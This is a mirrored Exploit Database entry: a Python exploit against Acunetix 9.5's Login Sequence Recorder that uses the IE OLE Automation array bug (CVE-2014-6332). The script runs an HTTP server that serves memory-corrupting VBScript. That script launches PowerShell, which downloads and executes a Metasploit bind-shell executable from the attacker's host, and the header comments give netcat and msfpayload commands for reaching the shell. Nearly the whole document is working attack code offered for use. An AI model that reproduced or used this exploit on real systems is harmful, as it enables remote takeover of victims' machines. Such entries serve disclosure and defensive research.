Acunetix 9.5 – OLE Automation Array Remote Code Execution

• Exploit Database
• 12 阅读

• 作者： Naser Farhadi
  日期： 2015-03-27
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36516/

• #!/usr/bin/python
  
  import BaseHTTPServer, sys, socket
  
  ##
  # Acunetix OLE Automation Array Remote Code Execution
  #
  # Author: Naser Farhadi
  # Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
  #
  # Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7
  # Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record 
  # Target Login Sequence
  # Exploit Based on MS14-064 CVE2014-6332 http://www.exploit-db.com/exploits/35229/
  # This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And
  # Metasploit windows/shell_bind_tcp Executable Payload
  # And Finally You Can Connect To Victim Machine Using Netcat
  # Usage:
  # chmod +x acunetix.py
  # ./acunetix.py
  # Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix
  # nc 192.168.1.7 333
  # Payload Generated By This Command:msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe
  # 
  # Video: https://vid.me/SRCb
  ##
  
  class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  def do_GET(req):
  req.send_response(200)
  if req.path == "/acunetix.exe":
  req.send_header('Content-type', 'application/exe')
  req.end_headers()
  exe = open("acunetix.exe", 'rb')
  req.wfile.write(exe.read())
  exe.close()
  else:
  req.send_header('Content-type', 'text/html')
  req.end_headers()
  req.wfile.write("""Please scan me!
  <SCRIPT LANGUAGE="VBScript">
  function runmumaa() 
  On Error Resume Next
  set shell=createobject("Shell.Application")
  command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\
  'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');"
  shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
  end function
  
  dim aa()
  dim ab()
  dim a0
  dim a1
  dim a2
  dim a3
  dim win9x
  dim intVersion
  dim rnda
  dim funclass
  dim myarray
  
  Begin()
  
  function Begin()
  On Error Resume Next
  info=Navigator.UserAgent
  
  if(instr(info,"Win64")>0) then
   exit function
  end if
  
  if (instr(info,"MSIE")>0) then 
   intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2)) 
  else
   exit function
   
  end if
  
  win9x=0
  
  BeginInit()
  If Create()=True Then
   myarray=chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
   myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
  
   if(intVersion<4) then
   document.write("<br> IE")
   document.write(intVersion)
   runshellcode()
   else
  setnotsafemode()
   end if
  end if
  end function
  
  function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
  end function
  
  function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
  If Over()=True Then
  ' document.write(i) 
   Create=True
   Exit For
  End If 
  Next
  end function
  
  sub testaa()
  end sub
  
  function mydata()
  On Error Resume Next
   i=testaa
   i=null
   redimPreserve aa(a2)
  
   ab(0)=0
   aa(a1)=i
   ab(0)=6.36598737437801E-314
  
   aa(a1+2)=myarray
   ab(2)=1.74088534731324E-310
   mydata=aa(a1)
   redimPreserve aa(a0)
  end function 
  
  
  function setnotsafemode()
  On Error Resume Next
  i=mydata()
  i=readmemo(i+8)
  i=readmemo(i+16)
  j=readmemo(i+&h134)
  for k=0 to &h60 step 4
  j=readmemo(i+&h120+k)
  if(j=14) then
  j=0
  redimPreserve aa(a2) 
   aa(a1+2)(i+&h11c+k)=ab(4)
  redimPreserve aa(a0)
  
   j=0 
  j=readmemo(i+&h120+k) 
   
   Exit for
   end if
  
  next 
  ab(2)=1.69759663316747E-313
  runmumaa() 
  end function
  
  function Over()
  On Error Resume Next
  dim type1,type2,type3
  Over=False
  a0=a0+a3
  a1=a0+2
  a2=a0+&h8000000
  
  redimPreserve aa(a0) 
  redim ab(a0) 
  
  redimPreserve aa(a2)
  
  type1=1
  ab(0)=1.123456789012345678901234567890
  aa(a0)=10
  
  If(IsObject(aa(a1-1)) = False) Then
   if(intVersion<4) then
   mem=cint(a0+1)*16 
   j=vartype(aa(a1-1))
   if((j=mem+4) or (j*8=mem+8)) then
  if(vartype(aa(a1-1))<>0)Then
   If(IsObject(aa(a1)) = False ) Then 
   type1=VarType(aa(a1))
   end if 
  end if
   else
   redimPreserve aa(a0)
   exitfunction
  
   end if 
  else
   if(vartype(aa(a1-1))<>0)Then
  If(IsObject(aa(a1)) = False ) Then
  type1=VarType(aa(a1))
  end if 
  end if
  end if
  end if
  
  
  If(type1=&h2f66) Then 
  Over=True
  End If
  If(type1=&hB9AD) Then
  Over=True
  win9x=1
  End If
  
  redimPreserve aa(a0)
  
  end function
  
  function ReadMemo(add) 
  On Error Resume Next
  redimPreserve aa(a2)
  
  ab(0)=0 
  aa(a1)=add+4 
  ab(0)=1.69759663316747E-313 
  ReadMemo=lenb(aa(a1))
   
  ab(0)=0
   
  redimPreserve aa(a0)
  end function
  
  </script>""")
  
  if __name__ == '__main__':
  sclass = BaseHTTPServer.HTTPServer
  server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
  print "Http server started", socket.gethostbyname(socket.gethostname()), 80
  try:
  server.serve_forever()
  except KeyboardInterrupt:
  pass
  server.server_close()